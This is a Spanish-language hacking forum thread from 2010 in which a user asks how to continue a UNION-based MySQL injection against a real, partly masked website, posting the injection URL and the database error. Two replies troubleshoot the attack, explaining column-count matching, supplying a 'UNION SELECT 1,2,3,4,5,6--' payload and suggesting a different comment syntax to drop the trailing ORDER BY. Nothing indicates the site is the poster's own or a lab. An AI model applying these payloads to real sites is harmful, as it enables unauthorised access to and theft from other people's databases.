elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
28 Mayo 2012, 05:32  


Tema destacado: Únete al Grupo Steam elhacker.NET

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits
| | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | |-+  [Ayuda]MySql injection.		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Ayuda]MySql injection.  (Leído 953 veces)
PHAMTOM

Desconectado Desconectado

Mensajes: 83

0x8B,0xEC,0x33,0xFF


Ver Perfil
[Ayuda]MySql injection.
« en: 12 Agosto 2010, 04:43 »
Buenas tengo una pagina,que me tiro error al hacer una consulta.

http://xxxx.xx/index.php?not=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--%E7&idc=38&p=1

el error es


No se pudo ejecutar la consulta

SELECT not_id,not_fecha,not_titulo,not_imagen,not_contenido,not_enlace FROM ptc_noticias WHERE not_id=-1 union select 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28--ç ORDER BY not_fecha

Error MySQL: : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ç ORDER BY not_fecha' at line 1

-----------------

Esta pagina es vulnerable a mysqlinject ? , una vez que termine de concactenar todas las columnas podre seguir como una inyeccion normal, ?? o asi no llegare a nada.salu2
En línea
Miran a cualquier ventana, mientras su pánico emana
y nubla su visión mi calma es pura precisión
cargo munición y miro tranquilo
ya ni respiro desde al ático os vigilo sigo al filo os tengo a tiro!

La kitchner quiere tanto a los pobres,que cada vez,tiene más
Shell Root


Desconectado Desconectado

Mensajes: 2.456


Alex Jurado


Ver Perfil WWW
Re: [Ayuda]MySql injection.
« Respuesta #1 en: 12 Agosto 2010, 05:25 »
A ver, hasta donde sé, si no me equivoco. Al unir un SELECT con otro SELECT, se necesita tener los mismos campos que el primer SELECT. Es decir,
Código
SELECT id, nombre, email FROM tbl_usuarios WHERE id = -1 UNION ALL SELECT 1, 2, 3--
El resultado sería:
Código:
id nombre email
1 2 3

Si se incluye ', 4' dentro del segundo SELECT, aparecería
Código
SELECT id, nombre, email FROM tbl_usuarios WHERE id = -1 UNION ALL SELECT 1, 2, 3, 4--
#1222 - The used SELECT statements have a different NUMBER OF COLUMNS

Lo otro, no entiendo del porque el ORDER BY not_fecha, esta allí donde lo tienes, xD. Nisiquiera esta en el contexto de la query, y si está, estaría como comentario.

___________
PD: Intentad así,
Código
-1+UNION+SELECT+1,2,3,4,5,6--&idc=38&p=1
« Última modificación: 12 Agosto 2010, 05:33 por Shell Root » En línea
---
tragantras


Desconectado Desconectado

Mensajes: 466


Ver Perfil
Re: [Ayuda]MySql injection.
« Respuesta #2 en: 18 Agosto 2010, 13:57 »
parece un residuo de la anterior query, prueba a comentar el final con \* en vez de con --
En línea
Colaboraciones:
1 2
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sql Injection logs (MySQL)
Nivel Web 		Ambr0si0 2 1,788 Último mensaje 6 Abril 2011, 09:52
por Ambr0si0
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines